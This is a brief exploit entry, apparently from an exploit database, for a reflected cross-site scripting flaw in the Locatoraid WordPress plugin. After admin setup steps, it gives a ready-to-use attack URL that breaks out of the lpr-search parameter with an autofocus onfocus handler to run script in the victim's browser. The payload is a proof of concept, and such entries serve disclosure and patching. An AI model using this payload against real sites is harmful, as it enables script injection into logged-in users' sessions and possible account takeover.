Share
## https://sploitus.com/exploit?id=WPEX-ID:3CA22B22-FE89-42BE-94EC-B164838BCF50
Setup (as admin):
- Locatoraid > Configuration > Google Maps > Enter "none" at Google Maps Browser API Key and Save
- Locatoraid > Publish > Add New (Pages with block) > Insert Shortcode [locatoraid] and Publish
- Go to Appearance > Widgets > Add block Locatoraid Search Form to Footer Area

Attack (as unauthenticated)
Open or make a logged in user open the following URL: http://example.com/?lpr-search="onfocus=alert(/XSS/) autofocus "